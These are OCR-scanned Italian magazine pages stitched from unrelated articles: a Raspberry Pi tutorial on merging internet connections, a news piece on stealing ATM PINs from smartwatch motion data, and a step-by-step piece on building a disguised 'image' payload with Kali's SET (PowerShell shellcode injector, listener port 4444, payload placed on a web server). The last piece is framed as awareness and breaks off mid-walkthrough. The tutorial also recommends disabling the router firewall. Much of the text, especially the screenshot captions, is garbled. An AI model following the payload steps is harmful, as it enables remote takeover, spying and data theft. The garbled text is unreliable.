The following packages vili be upgraded 
libssll.0.0 

1 upgraded, 42 newly installed, 0 to re 
Need to get 4,481 kB of archives. 

After this operation, 12.9 MB of additi 
Do you want to continue? [Y/nJ | 


x Così gestiamo i pacchetti di dati 

^ Prima di proseguire con l’installazione del load balancer, 
cioè del sistema automatizzato che ci consentirà di usare 
una delle connessioni disponibili, sempre da terminale digitiamo il 
comando sudo apt-get instali -y npm (seguito dal tasto Invio) per 
scaricare e installare il pacchetto npm e confermiamo con Yes. 



x Aggiornamento in corso... 

Per verificare che la versione di Dispatch-proxy scaricata sia 
la più recente (e, in caso contrario, procedere al suo aggior¬ 
namento) diamo il comando sudo npm update -g dispatch-proxy. 
Al termine, il nostro mini PC sarà pronto per "unire” tra loro le con¬ 
nessioni Internet di cui disponiamo. 
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LOAD BALANCER: QUESTO SCONOSCIUTO 

Abbiamo scoperto che il software che ci permette di scaricare alla massima velocità 
"unendo"tutte le connessioni ad Internet che abbiamo a disposizione si chiama Dispatch- 
proxy. Ma essenzialmente di cosa si occupa e come funziona? Tecnicamente questo 
software, che in gergo prende il nome di load balancer, non fa altro che bilanciare in 
maniera intelligente il carico (ovvero il traffico dati) sulle diverse connessioni disponibili. 

Così facendo, ad esempio, se un PC della LAN richiede il download di un file, Dispatch- 
proxy mette a disposizione la connessione ADSL. Per la semplice navigazione Web, invece, 
verrà utilizzata la connessione che offre la banda minore. Il tutto, come già detto, avviene 
in maniera del tutto automatica: non dobbiamo dunque perderci in mille configurazioni. 
Sarà Dispatch-proxy a stabilire quale PC deve utilizzare questa o quella connessione a Internet 



H L’unione fa la forza! SI® 


Vediamo adesso come condividere con il Raspberry Pi 3 la connettività 4G dello smartphone 
Android e quella della nostra ADSL. Basta seguire pochi semplici passi per riuscirci. 



^ Una visione d’insieme 

Affidandoci ancora una volta al terminale di Raspbian, digi¬ 
tiamo dispatch list seguito da Invio. Vengono mostrati tut¬ 
ti gli accessi a Internet disponibili e ai quali il Raspberry Pi 3 è già 
collegato. Da questi dobbiamo escludere la sezione lo (diminutivo di 
localhost, l'indirizzo di rete locale). 


jMfirjtpberrfpi 

U 


vi «no 

ftW; Ak« 



^ Attiviamo il tetherinq Wi-Fi 

Dal nostro smartphone Android spostiamoci in Impostazioni 
e, nella sezione Wireless e reti, tappiamo su Altro: attiviamo 
il tethering Wi-Fi. Ritorniamo al Raspberry Pi 3: cliccando sull'ico¬ 
na di rete (in alto a destra) selezioniamo la rete Wi-Fi condivisa dallo 
smartphone, poi connettiamoci. 


:c«4:i«S:cH6;3cfcj 

Mi 

l«.lM.q.l47 CIP»4> 


127.0,0.1 (USI. int«"4l> 

1_U IIP*. int«r«l) 

hO 

192.1M.1.22 (IIS4) 

(liso) 


.200 

192.104.1.21 (I(S4) 

upv») 



NESSUN LIMITE! 

E se disponessimo di al¬ 
tre connessioni da con¬ 
dividere, ad esempio il 
Wi-Fi del vicino (che ci 
autorizza a connetterci 
alla sua rete senza fili) 
o un altro smartphone 
sul quale configurare il 
tethering? Non ci sono 
problemi! Dispatch-pro¬ 
xy, infatti, non mette 
alcun paletto sul nu¬ 
mero di connessioni da 
"unire"fra loro. L'unico 
vero limite è il numero 
di interfacce Wi-Fi col¬ 
legabili al Raspberry Pi 
3: il numero di ingressi 
USB disponibili, infatti, 
è pari a 4 di cui 1 è già 
occupato dalla Internet 
Key. Di conseguenza 
potremo connetterci 
"solo" ad altre 3 reti 
senza fili. Nel caso in cui 
volessimo strafare, per 
estendere il numero di 
porte USB sarà necessa¬ 
rio acquistare un HUB 
USB alimentato. 


^ Una nuova connessione! 

Dal terminale diamo il comando dispatch list. l'interfaccia 
wlanO del Raspberry Pi 3 è connessa al Web grazie al nostro 
smartphone Android. Se abbiamo a disposizione anche una chiavetta 
Wi-Fi USB (o il nostro vicino di casa ci consente di collegarsi alla sua 
rete wireless), possiamo connetterci ad una seconda rete senza fili. 


Utilizziamo un cavo Ethernet 

^ Colleghiamo il Raspberry Pi 3 al router ADSL di casa tramite 
un cavo Ethernet. Dopo aver connesso il cavo sia al router 
sia alla scheda dì rete del Raspberry Pi 3, lanciamo nuovamente il 
comando dispatch list per verificare che sìa presente anche la con¬ 
nessione via cavo di rete identificata dall'etichetta ethO. 


► 
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LA MIA CHIAVETTA È COMPATIBILE? 

La maggior parte delle Internet key viene fornita con un software che ci permette di stabilire subito la connessione 
. Questi software, però, il più delle volte sono disponibili solo perWindows e, quando collegheremo una qualsiasi 
Internet key al Raspberry Pi 3 equipaggiato con Raspbian (che è una distribuzione Linux), non saremo in grado 
di utilizzarli. Dobbiamo inoltre fare anche i conti con i driver che permettono il corretto riconoscimento della 
chiavetta al mini PC. Fortunatamente le più diffuse Internet key (come l'Pluawei E353 usata per i nostri test) 
vengono riconosciute al primo colpo e dunque non bisogna cercare il giusto driver. E se disponiamo di una 
chiavetta differente? In questi casi è bene fare prima una ricerca sul Web per verificare la compatibilità con 
il sistema operativo Linux e l'eventuale disponibilità di driver. Se non conosciamo il modello della Internet 
key, colleghiamola a uno degli ingressi USB del Raspberry Pi 3 e, da terminale, lanciamo il comando Isusb: 
nella lista che appare troveremo il produttore e il nome del modello in nostro possesso. 



OCCHIO Al 
CONSUMI! 


Quasi tutti i piani mo¬ 
bile prevedono delle 
soglie (in termini di 
tempo odi quantità di 
traffico scambiato) che 
è bene non superare. 
Già, perché varcato il 
limite, il nostro conto 
telefonico potrebbe 
lievitare di molto e in 
periodi di crisi come 
questi non è proprio il 
caso! Per evitare brutte 
sorprese, dunque, è 
bene registrarsi sul 
sito Web dell'operatore 
che abbiamo deciso 
di utilizzare e verifi¬ 
care periodicamente 
dall'area personale 
quanto tempo/traffico 
(a seconda del piano 
prescelto) abbiamo già 
consumato. 


Q Aggiungiamo anche il 3G! 

Non tutte le Internet key vengono riconosciute al primo colpo. Ecco come configurare la 
chiavetta Huawei E353 e far sì che si connetta automaticamente e senza problemi al Web. 




Link •***>:Eth*rr*t S6:2c:80:1 

xr*t ***: 169.2*4.1«.» Bc*st:16*.»4.2».2W 
ir*te éói r: f*tt::3tó:bO**:23df:<0c9/64 < 

IP BROADCAST HMCNZ NJLTXCAST «TU: 1900 Nitrici 
NK p*<k«u:0 «rror*:0 dropp*d :0 ov«rrurtt:0 4r»ai:0 
tx «rr«r«:o dropp+d :0 i N r r vNiO eérrif :0 

llÌMont:) 


coll: 


*:0 t>qu»utlon :1000 
yt«t :0 tO.O 9 ) TX byti: 1 


' HI* 


-j. Installiamo tutto il necessario 

Dal terminale di Raspbian lanciamo il comando sudoapt-get 
instaliusb-modeswitch e confermiamo con Invio. Attendia¬ 
mo che il pacchetto venga installato e, non appena apparirà un mes¬ 
saggio di conferma, colleghiamo la chiavetta 3G ad un ingresso USB 
del Raspberry Pi 3. 


^ La Internet Kev è stata riconosciuta! 

Attendiamo qualche secondo (il tempo necessario che il 
sistema riconosca la chiavetta 3G appena collegata) e lan¬ 
ciamo il comando ifconfig -a seguito da Invio. Analizziamo l’output 
mostrato a schermo: se è presente la sezione wwanO, vuol dire che 
tutto sta andando per il verso giusto. 



^ Il file per la giusta configurazione 

Superata questa fase, digitiamo il comando sudo nano/etc/ 
network/interfaces e confermiamo con Invio. Aggiungiamo 
al file di testo mostrato a schermo le nuove righe allow-hotplug 
wwanO e iface wwanO inet dhcp. Salviamo con Ctrl+O. A questo 
punto, possiamo uscire dall’editor con Ctrl+X. 


a Adesso siamo connessi anche al 3G! 

4 Lanciamo il comando sudo reboot ed attendiamo che il 
Raspberry Pi 3 venga riawiato. Non appena il sistema ope¬ 
rativo sarà di nuovo ricaricato, apriamo il terminale e lanciamo il 
comando dispatch list. se è presente la nuova sezione wwanO, vuol 
dire che la chiavetta 3G è connessa al Web! 
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STre connessioni in una! 

Tutto è pronto per navigare con la nostra Internet superveloce: quello che dobbiamo fare 
è lanciare un comando e configurare il PC per collegarsi al Web mediante Dispatch-proxy. 



^ Basta un semplice comando! 

Tutto è pronto per “unire” le 3 differenti connessioni: ADSL, 
chiavetta 3G e tethering Wi-Fi dello smartphone Android. 
Dal terminale di Raspbian, lanciamo il comando dispatch start 
-http seguito da Invio. Apparirà un messaggio che ci confermerà 
l'avvio di un nuovo server proxy. 



^ I parametri del proxv 

Prima di poter navigare, però, è necessario smistare tutto il 
traffico Web proprio sul nuovo proxy. Se sul mini PC abbia¬ 
mo già installato Mozilla Firefox, spostiamoci nelle sue impostazioni 
e, da Connection Settings , compiliamo il campo HTTP Proxy con 
localhoste Pori con 8080. 



^ Pensiamo anche agli altri PC! 

2 Dal nostro PC (o da uno qualsiasi di quelli connessi alla 
LAN) avviamo il browser Internet. Nel caso di Google Chro- 
me, spostiamoci in Impostazioni/Rete. Clicchiamo su Modifica 
impostazioni proxy e compiliamo il campo Indirizzo con IIP del 
Raspberry Pi 3. Indichiamo la Porta SOSO e confermiamo con OK. 


x Configurazione globale 

^ Se stiamo utilizzando Windows 10, digitiamo nella barra 
di ricerca Proxy e clicchiamo su Impostazioni del proxy 
di rete. Abilitiamo la voce Usa server proxy e compiliamo i campi 
Indirizzo e Porta con gli stessi dati utilizzati al passo precedente. 
Confermiamo con Salva. 



UN NUOVO 
FIREWALL 

Affinché il Raspberry 
Pi 3 riesca a fornire la 
connettività al resto 
della LAN, è necessa¬ 
rio che tutti gli altri 
computer e dispositivi 
siano connessi al rou¬ 
ter ADSL (quest'ultimo 
collegato con un cavo 
Ethernet al mini PC). 
Inoltre, è preferibile 
disattivare il firewall 
integrato nel router. 
Per fare ciò, accediamo 
al pannello di gestione 
del router ADSL (solita¬ 
mente è raggiungibile 
tramite browser all'in¬ 
dirizzo 792.76S. 7.7). 
Disattivando il firewall 
del router saremo 
comunque protetti. 
Raspbian, infatti, offre 
di default un firewall 
ben più performante 
e sicuro! 


TIRIAMO LE SOMME E TESTIAMO LA NOSTRA SUPER-CONNESSIONE ADSL 

Qual è la velocità effettiva di navigazione? Ecco i risultati dei test effettuati nei nostri laboratori. 


Per effettuare i nostri test abbiamo utilizzato 
una classica connessione ADSL a 20 Mega, ag¬ 
giungendo il tethering 3G di un smartphone 
nel quale abbiamo inserito una SIM FI3G con 
connettività 4G. La nostra Internet key è in grado 
di connettersi unicamente alla rete 3G. Nono¬ 
stante ciò, effettuando dei test di velocità sul 
noto sito Speedtest.net e come si evince dalla 
tabella a fianco, siamo stati capaci di triplicare la 
banda a disposizione. Certo, la velocità effettiva 
di navigazione si manterrà sulla velocità della 
connessione utilizzata al momento (ADSL, 3G 


o 4G in tethering, ovvero quella che Dispatch- 
proxy riterrà più"scarica"e idonea alla richiesta 
dell'utente) ma di fatto le prestazioni nell'intera 
LAN miglioreranno di molto! Resta ovvio che, 


nel caso in cui avessimo avuto a disposizione 
una connessione in fibra ottica e una Internet 
key capace di navigare anche sulla rete 4G, il 
risultato sarebbe stato notevolmente migliore. 


j CONNETTIVITÀ 

COLLEGAMENTO 

VELOCITÀ EFFETTIVA ! 

ADSL 

Ethernet 

17,4Mb/s 

3G/HSPA+ 

Modem 3G USB 

11,6 Mb/s 

TETHERING 4G 

Wi-Fi 

23,67 Mb/s 


BANDATOTALE 

52,67 NIB/S 
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O Hacker in pratica 


Attualità | Ti spio il PIN con lo smartwatch 



Ti spio il PIN con 


lo smartwatch 


Ecco come un banale giroscopio può essere sfruttato 
da qualche malintenzionato per clonare le nostre 
carte di credito 


C i siamo dotati di un nuovo, favoloso, smar¬ 
twatch? Allora teniamo d'occhio il conto in 
banca, perché oltre alla spesa necessaria per ac¬ 
quistarlo, sta mettendo a rischio la sicurezza dei 
nostri fondi! A lanciare l'allarme sono stati alcuni 
ricercatori, tra i quali Yingying Chen e Chen Wang 
dello Stevens Institute ofTechnology, che nel loro 
studio da poco pubblicato hanno dimostrato 
com'è possibile sfruttare questi dispositivi per 
impossessarsi del codice PIN di una carta banco¬ 
mat. In breve: i sensori di uno smartwatch sono in 
grado rilevare il movimento della mano mentre 
digita il codice PIN, quindi intercettando questi 
dati è possibile risalire ai fatidici numeri digitati 
sulla tastiera dello sportello bancario o di un POS. 
Ma funziona davvero? I ricercatori sostengono 
che al primo tentativo la precisione è dell'80%, 
mentre con tre tentativi la percentuale sale al 90. 
E questo su un campione, ben rappresentativo, 
di oltre 5000 digitazioni su tastierini di bancomat 
e tastiere per computer. 

Partire da un video 

Posto, dunque, che si tratta di un sistema ef¬ 
ficace, cerchiamo di capire come i ricercatori 


sono arrivati a svilupparlo. La prima osser¬ 
vazione è relativa alla modalità di utilizzo di 
uno smartwatch o un dispositivo indossabile 
(wearable device): chi ne acquista uno, è solito 
tenerlo al polso durante buona parte della 
giornata. Posto che i sensori dell'apparec¬ 
chio sono sempre attivi e dunque registrano 
in continuazione i dati di movimento, ci si 
è chiesto cosa succederebbe se, sfruttando 
una connessione Bluetooth o un software 
spia, fosse possibile sgraffignare tutte queste 
informazioni. Chen, Wang e colleghi hanno 
così dapprima considerato uno studio della 
Syracuse University in cui si ipotizzava un at¬ 
tacco "video" per impossessarsi del PIN tramite 
uno smartphone. In questo studio si afferma 
che sulla base di un video registrato con uno 
smartphone, nel quale si intravedono le mani 
che digitano un PIN, è possibile ricavare il 
relativo codice. All'epoca, parliamo del 2014, 
lo studio di Shukla, Kumar, Serwadda e Phoha 
aveva dei limiti, con una riuscita del 62% al 
primo tentativo e del 94% entro i primi dieci 
tentativi. Così, il gruppo dello Stevens Institute 
ofTechnology ha ben pensato di affinare la 


Non tutti i mali vengono per nuocere 

L o studio scientifico analizzato volontari dei testi tendevano a effettua la digitazione, e questo Stevens Institute ofTechnology 
nell'articolo è stato eseguito utilizzare gli stessi, identici, ango- non si verifica sempre. Inoltre, rappresenta la porta di accesso a 
su una buona varietà di dispositi- li per passare da un tasto a un al- benché sgraffignare i dati dei un mondo di opportunità: la ca¬ 
vi. Per quanto riguarda le tastiere, tro. Dovremo dunque toglierci lo sensori possa sembrare un gio- pacità di rilevare in modo preciso 
oltre a quella Dell già menzio- smartwatch quando accediamo chetto da ragazzi, in realtà non il movimento di una mano su una 
nata, alcuni modelli presi diret- al nostro conto da uno sportello lo è affatto. Infine, ricordiamoci determinata superficie potrebbe 
tamenteda sportelli bancomat, automatico? In teoria, i maniaci sempre che ottenere il PIN àsolo aprire interessanti opportunità 
Per gli smartwatch considerati, della privacy lo dovrebbero fare uno dei due passaggi necessari nei sistemi di riconoscimento 
invece, oltre all'lnvensence, an- eccome, ma ci sono ovviamente per utilizzare la carta bancomat e nelle indagini informatiche, 
che LG W150 e Moto360. Come dei limiti allo studio da conside- di un utente: dopo, infatti, questa Come ogni buono studio che 
anticipato, i risultati si sonodimo- rare. Innanzitutto, è necessario va rubata o clonata. Di nuovo, si rispetti, infatti, ci sono sem- 
strati molto buoni, anche perché, che lo smartwatch sia indossato non si tratta di un'operazione co- pre due lati della medaglia da 
come osservato dai ricercatori,! sul polso della mano con cui si sì banale. Tuttavia, lo studio dello considerare. 
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Hacker in pratica C* 


Così clonano il PIN spiando i movimenti dello smartwatch 


I Un malintenzionato, incapa¬ 
ce di osservare il PIN digitato 
dalla vittima, è comunque in 
grado di accedere ai dati che 
lo smartwatch trasmette allo 
smartphone. 
Un dispositivo 
wearable, in¬ 
fatti, è di so¬ 
lito collegato 
al telefono 
dell'utente 
per inviargli 
dati che poi 


vengono elaborate tramite ap¬ 
posite app. 


2 Anche in mancanza di uno 
smartphone lo smartwatch 



ha sempre attivata una qualche 
forma di comunicazione ester¬ 
na, di solito mediante Bluetooth 
Low Energy (BLE), meno protetta 
rispetto al classico Bluetooth e 
quindi è piuttosto semplice cat¬ 
turare i dati che trasmette grazie 
a una tecnica di "sniffing". 

3 Un malintenzionato può 
anche installare un'app spia 
nello smartphone o nello smar¬ 
twatch. Qualunque sia il meto¬ 
do usato, a questo punto c'è una 



connessione diretta tra il pirata 
e i dati rilevati dallo smartwatch. 
Quando la vittima muove la ma¬ 
no per digitare il PIN, tali movi¬ 
menti vengono intercettati! 



tecnica e affidarsi non più a un video ma a 
precisi dati di posizione forniti da dispositivi 
wearable che, ormai, sono diventati prodotti 
di massa con oltre 70 milioni di unità vendute. 
Questa metodologia offre dei vantaggi note¬ 
voli anche rispetto ad altre tecniche piuttosto 
diffuse. Per esempio le telecamere nascoste 
nelle cabine bancomat, o i così detti skimmer, 
cioè quegli apparecchi che, appoggiati allo 
sportello, leggono la carta non appena viene 
infilata nella fessura. Il principale di questi 
vantaggi è la precisione, come anticipato, 
e poi c'è da considerare la discrezione delle 
apparecchiature necessarie. Per capire di cosa 
parliamo, tuttavia, è necessario scendere in 
qualche piccolo dettaglio tecnico. 

Come ti rubo i movimenti 

Il punto di partenza dei ricercatori dello Ste- 
vens Institute of Technology è un individuo 
senza scrupoli, incapace di osservare il codice 
PIN digitato dalla vittima, ma in grado invece di 
accedere ai dati che lo smartwatch trasmette 
allo smartphone. Qui è bene sottolineare, 
infatti, che un dispositivo come uno smar¬ 
twatch è di solito collegato al telefono per 
inviargli dati che poi quest'ultimo elabora 
tramite apposite app. Anche in mancanza di 
uno smartphone, comunque, lo smartwatch 
ha sempre attivata una qualche forma di co¬ 
municazione esterna, che nella stragrande 
maggioranza dei casi è un sistema Bluetooth 
Low Energy (BLE). Questa tecnologia, rispetto 
al classico Bluetooth, è molto meno protetta 
e quindi è piuttosto semplice catturare i dati 
che trasmette grazie a una tecnica che va 
sotto al nome di "sniffing". In alternativa, un 
malintenzionato può sempre installare un sof¬ 
tware spia nello smartphone della vittima o nel 
dispositivo wearable. Qualunque sia il metodo 
utilizzato, a questo punto c'è una connessione 


diretta tra il malintenzionato e i dati rilevati 
dallo smartwatch. La vittima, al momento di 
muovere la mano per digitare il PIN, applica 
una serie di accelerazioni e decelerazioni sul 
polso. Il lavoro dei ricercatori si è quindi con¬ 
centrato sul decodificare queste informazioni 
così specifiche, in modo da tradurle nei "clic" 
sulla pulsantiera dello sportello. 

Questione di accelerazione 

Innanzitutto, la prima osservazione di Wang 
e colleghi è che l'utente imprime un'accele¬ 
razione verso il pulsante mentre lo preme, 
decelerando invece quando ha terminato la 
pressione e sta staccando il dito dal tasto. Si 
tratta dell'informazione più semplice, se ci 
pensiamo bene. Diverso il discorso quando il 
dito si sposta per passare da un pulsante a un 
altro. In questo caso, dati i tre assi X, Y e Z dello 
spazio tridimensionale, il terzo rimane quasi 
costante mentre l'accelerazione avviene sui 
primi due. Quindi, stabilendo dei riferimenti 
sulla base del tipo di smartwatch e dei dati 
raccolti, la sfida, per i ricercatori dello Stevens 
Institute of Technology era infilare tutto in 
un algoritmo che, alla fine, fosse in grado di 
rilasciare il prezioso codice. 

Tasti e distanze 

Allo scopo, i ricercatori hanno creato un siste¬ 
ma composto dal tastierino numerico di una 
normale tastiera da computer e un sensore 
di tipo Invensense MPU-9150, del medesimo 
tipo di quelli che si trovano negli smartwatch, 
tanto che è stato collegato proprio al polso 
delle "cavie". Dapprima, si sono rilevate le ac¬ 
celerazioni relative allo spostamento del dito 
dal pulsante dal 4 al 5 (quindi in orizzontale), e 
poi dal 5 all'8 (in verticale). Con un'espressione 
matematica, dalle accelerazioni si è ricavato 
lo spazio percorso, simile in ambo i casi. E si 


è ricavato un errore medio tra 0,24 e 0,27 cm 
su una distanza effettiva di 1,9 cm. Tutto som¬ 
mato, un'approssimazione ritenuta più che 
buona per proseguire nella ricerca. Il lavoro, 
a questo punto, si è concentrato sul filtrare le 
informazioni inutili, per ottenere la massima 
precisione possibile. I ricercatori, per esempio, 
si sono presto resi conto che la mano di un 
individuo, mentre digita un codice PIN, tende a 
vibrarla fare movimenti non previsti e, in ultima 
analisi, a "sporcare" il segnale. Per contro, vista 
la natura dello studio, che mira a prevedere un 
attacco da parte di un malintenzionato, non si 
può pretendere che il movimento sia "pulito" 
o allenato preventivamente. Che fare, dunque? 
Allo Stevens Institute ofTechnologies avevano 
davvero un grosso problema dal risolvere. 

Potenza della matematica 

Per fortuna, dopo qualche mese, i ricercatori 
sviluppano un metodo matematico molto 
sofisticato per calibrare le informazioni ot¬ 
tenute e ottenere una dimensione piuttosto 
precisa della pulsantiera sulla base dei soli 
movimenti registrati dallo smartwatch. Una 
volta stabilita la griglia contenente tutti i pul¬ 
santi, basta quindi considerare il movimento 
del dito su di queste per rilevare l'agognato 
codice. Si tratta di una complessa sequenze 
di formule che, nell'ordine: stima distanza e 
direzione della mano durante l'inserimento di 
due numeri del codice, calcola la distanza tra 
due pulsanti, stima la "griglia" della pulsantiera 
e, infine, tramite un processo inverso, ricava 
tutti i numeri in sequenza. In questo raffinato 
sistema gioca un ruolo chiave la pressione del 
pulsante "Enter" o "Conferma". La sua posi¬ 
zione è fissa in tutte le tastiere e rappresenta, 
di fatto, l'unico punto di riferimento preciso. 
Tanto basta, però, per risalire al PIN sulla base 
dei dati di movimento della mano! 
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Fai da te | Un keylogger nelle foto 


Ti entro nel PC 
con una foto! 

C’è chi riesce a nascondere un keylogger in una Jpeg per rubare dati 
personali o per registrare dalla webcam quello che facciamo in casa 


C i risiamo. I pirati se ne sono inventata un’altra delle loro per inva¬ 
dere i nostri PC e spiarci dalla Webcam, scovare ogni password che 
digitiamo sulla tastiera e spulciare fra i nostri file. E non siamo di 
fronte al solito virus che solo gli utenti più sprovveduti possono beccare: 
qui non si tratta di una "classica” e-mail di phishing contenente un link 
malevolo e neppure di uno strano file che fa intuire un potenziale pericolo. 
Questa volta siamo di fronte ad una semplice immagine. Sì, proprio così. 
I pirati hanno trovato il metodo di nascondere un virus dentro quella 
che, almeno apparentemente, sembra una banalissima JPEG. Un doppio 
clic sull'anteprima dell’immagine di un gattino, di una bella donna sexy 
o di un’automobile da urlo potrebbe costarci davvero caro! 

Sembra un’immagine 

Anche se all'apparenza sembra di ritrovarsi di fronte ad una comunissima 
immagine, magari anche divertente (perché, ovviamente, l’obiettivo 


del pirata è quello di indurci al doppio clic) siamo di fronte ad un file 
eseguibile che andrà a compiere azioni malevoli sul nostro sistema 
operativo. In particolare, creerà un canale di comunicazione fra il no¬ 
stro PC e quello del pirata che ne assumerà il pieno controllo attivando 
da remoto la Webcam, installando un keylogger o facendo incetta dei 
nostri file più importanti. Per sferrare il suo attacco, il pirata si affida a 
Kali Linux, un sistema operativo già corredato di tutti i tool necessari a 
testare la sicurezza di computer e dispositivi di ogni genere. E la facilità 
con la quale può portare a termine la sua opera è davvero disarmante: al 
pirata basta scegliere un paio di opzioni, l'immagine da usare e attendere 
che qualche “pesce” abbocchi alla sua esca. In questa nuova avventura 
abbiamo deciso di analizzare a fondo le mosse del pirata operando in 
una rete locale, ma la procedura è identica allargando il discorso al Web. 
Perché, si sa, conoscere il nemico è l’unica arma di difesa che abbiamo 
a disposizione. 


□ Quali sono i ferri del mestiere 


Per sferrare il suo attacco, il pirata ricorre ad una particolare distribuzione Linux, usata generalmente 
per effettuare test di sicurezza. Ecco come la scarica e la installa su una comune pendrive USB. 





^ Linux su pendrive 

Il pirata scarica dal Web Kali Linux e il sof¬ 
tware gratuito Unetbootin. Avvia quest’ulti¬ 
mo e clicca sul pulsante Sfoglia in corrispondenza 
di Immagine iso per caricare la ISO della distro: la 
seleziona e conferma con Apri. Collegata una pen¬ 
drive da almeno 4 GB al suo PC, Il pirata si sposta in 
Unità e la seleziona. 


^ Un salto nel BIOS e... 

Clicca OK e attende che sulla pendrive ven¬ 
ga installata la distribuzione Linux. Il pirata 
riavvia quindi il PC (di solito ne usa uno secondario 
perché più avanti avrà la necessità di usare Win¬ 
dows senza uscire da Kali Linux) e, dopo aver effet¬ 
tuato l’accesso al BIOS, configura il boot dalla pen¬ 
drive USB. 


^ ... il sistema è pronto! 

Salvate le modifiche e riavviato il compu¬ 
ter dalla chiavetta USB, il pirata si ritrova di 
fronte l’interfaccia testuale di Kali Linux. Tutto quel¬ 
lo che deve fare è premere Invio in corrispondenza 
della riga Live (amd64)\ dopo pochi secondi, il suo 
ambiente di distruzione verrà caricato e sarà pron¬ 
to all’uso. 


28 Win Magazine Speciali 





















Un keylogger nelle foto | Faldate 


Hacker in pratica 


COME SMASCHERARE L'INTRUSO! 


Come abbiamo detto, dietro ad un'ap¬ 
parente immagine inviata da un ma¬ 
lintenzionato si nasconde un vero e 
proprio file eseguibile (con estensione 
EXE). Dunque, basterebbe osservare 
per bene il file per rendersi subito conto 
di ritrovarsi di fronte ad un tranello. 
Peccato, però, che di default Windows 
nasconda le estensioni per i tipi di file 
più conosciuti e fra questi c'è anche 
il .exe. La maggior parte degli utenti, 
per comodità o pigrizia, lascia invariata 
questa funzionalità di Windows ma 


per dormire sonni tranquilli, forse è 
il caso di attivare la visualizzazione di 
ogni estensione. In Windows 10 basta 
aprire una qualsiasi cartella e spostarci 
nel menu Visualizza. Da qui clicchiamo 
su Opzioni e, nella nuova finestra che 
appare, spostiamoci nel tab Visualiz¬ 
zazione. Scorriamo l'elenco Imposta¬ 
zioni avanzate e togliamo la spunta 
da Nascondi le estensioni per i tipi di 
file conosciuti, confermando con OK. 
Da questo momento, nessuna falsa ci 
trarrà più in inganno! 


Opzioni cartella 

Generale Visualizzazione Cerca 
Visualizzazione cartelle 

È possibile applicare questa visualizzazione (ad 
:. ? esempio Dettagli o Icone) a tutte le cartelle di questo 
tipo. 


Applica alle cartelle 


Reimposta cartelle 


Impostazioni avanzate: 


PI Mostra descrizione rapida della cartella e degli oggetti del />. 
PI Mostra gestori delle anteprime nel riquadro di anteprima 
p] Mostra lettere di unità 

I I . 


13 Attacco al cuore di Windows 

Grazie al tool SET integrato nella distribuzione Kali Linux, il pirata riesce a predisporre in pochi clic un canale 
di comunicazione nascosto fra il suo computer e quello della vittima designata, vediamo in che modo. 



Il tool segreto 

| L’ambiente desktop di Kali Linux è abbastan¬ 
za semplice e intuitivo. Dopo aver cliccato sul 
menu Applicazioni (in alto a sinistra dell’interfaccia 
principale) ed essersi spostato nella sezione Social 
Engineering Tools, il pirata awia il software SET (acro¬ 
nimo di Social Engineering Tools). 



.x II giusto indirizzo IP... 

^ Il pirata dovrà conoscere l'indirizzo IP della 
macchina attaccante. Per farlo cliccherà su 
File e seleziona Apri terminale. Nella nuova finestra 
digita ifconfig seguito da Invio: l'indirizzo IP appare 
accanto al testo inet. Lo incolla nella finestra di SET e 
conferma con Invio. 



± I settaggi perfetti 

Nella finestra che appare a schermo, il pirata 
preme dapprima Invio e, successivamente 1, 
seguito da Invio, per selezionare l’opzione Social Engi¬ 
neering Attacks. Si ritrova di fronte ad un altro menu 
nel quale effettuare una scelta: preme 9 (Powershell 
Attack Vectors) e conferma con Invio. 



^ ...eia porta da usare 

SET chiede al pirata di settare una porta da 
utilizzare per comunicare con il PC attaccato 
non appena verrà stabilita una connessione (owero, 
quando l'ignara vittima avrà aperto la finta immagi¬ 
ne). Il pirata setta la porta che preferisce (ad esempio 
la 4444) e confermare con Invio. 



± Tipo di attacco 

Infine, il pirata deve decidere quale tipologia di 
attacco sferrare nei confronti della sua vittima 
designata. Per essere sicuro di ottenere un controllo 
completo del computer attaccato, il pirata sceglie l'op¬ 
zione 1 (Powershell Alphanumeric Shellcode Injec- 
tor) e conferma con Invio. 



± È tutto fo quasi) pronto 

0 II software crea automaticamente tutto il 
necessario: il pirata non deve fare altro che 
restare a guardare il monitor. Al messaggio Doyou 
want to start thè listener now risponde no e conferma 
ancora con Invio. Il pirata può ora concentrarsi sulla 
finta immagine da inviare alla vittima. ► 


Speciali Win Magazine 29 




































C* Hacker in pratica 
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WINDOWS COME SE FOSSE LINUX 


Come abbiamo già intuito, il pirata ha la 
necessità di effettuare gran parte del suo 
lavoro su una macchina equipaggiata con 
Kali Linux.Tuttavia, alcune delle mosse da 
lui effettuate, come la compilazione del 
virus (il file .exe mimetizzato da immagi¬ 
ne) possono essere fatte anche da un PC 
equipaggiato con Windows.Tutto quello 
che gli occorre è la suite MinGW, acronimo 
di Minimalist GNU for Windows. Grazie a 
questo software, il pirata ha un completo 
ambiente di compilazione per il linguag¬ 
gio di programmazione C (utilizzato dal 


pirata per creare il virus). Scaricato MinGW 
dal sitowww.mingw.org, il pirata lo avvia e 
da Basic Setup marca per l'installazione le 
voci mingw32-base e mingw32-gcc-g++. 
Non appena le due "estensioni" saranno 
scaricate e installate, il pirata potrà usare il 
prompt dei comandi di Windows proprio 
come se fosse una shell Linux, quantome¬ 
no per la compilazione di software scritto 
in linguaggio C. Per trasformare un file .c 
in un eseguibile, infatti, gli basta lanciare 
il comando gcc.exe C:\nome_file.c -o C:\ 
nome_file.exe. 




COS'ÈUN 

PAYLOAD? 


In gergo informatico 
è un termine abba¬ 
stanza frequente, 
almeno quando si 
parla di sicurezza. Per 
payload, infatti, si 
intende l'insieme di 
operazioni che un virus 
esegue all'interno della 
macchina bersaglio. 
Diversi sono i tipi di 
payload che un pirata 
può creare: si parte da 
operazioni (runtime) 
semplici come quella 
che consente l'invio di 
un messaggio di posta 
elettronica a tutti i con¬ 
tatti memorizzati nel 
PC, fino ad arrivare ad 
esecuzioni decisamen¬ 
te più pericolose come 
la cancellazione di tutti 
i file memorizzati nel 
disco rigido. 


0 La foto infetta è pronta 

Stabilito un canale di comunicazione protetto con il PC della vittima, il pirata provvede ora a 
trasferire il payload del virus e l'immagine da far visualizzare alla vittima su un Web server. 



a Payload pronto ad agire! 

Il pirata awia una nuova finestra del terminale di Kali Linux, 
lancia il comando mv/root/.set/reports/powershell/x86_ 
powershelljnjection. txt/var/www/html/payload. txt e conferma 
con Invio. Il payload è ora stato spostato sul Web server di modo 
che sia accessibile anche agli altri PC. 


ubuntu [In esecuzione] - Oracle VM VirtualBox 

Applicazion 

Posizioni ▼ JR Iceweasel 


Top-30-Funny-Cat-Meme: 

G funny 
f qui 

Most Visit 

iàfa. - f- - ~ fcV- t _ -> r\ c - r~ aa 


Nome: screenshot.jpg| 



Salva nella cartella: ? var www html 


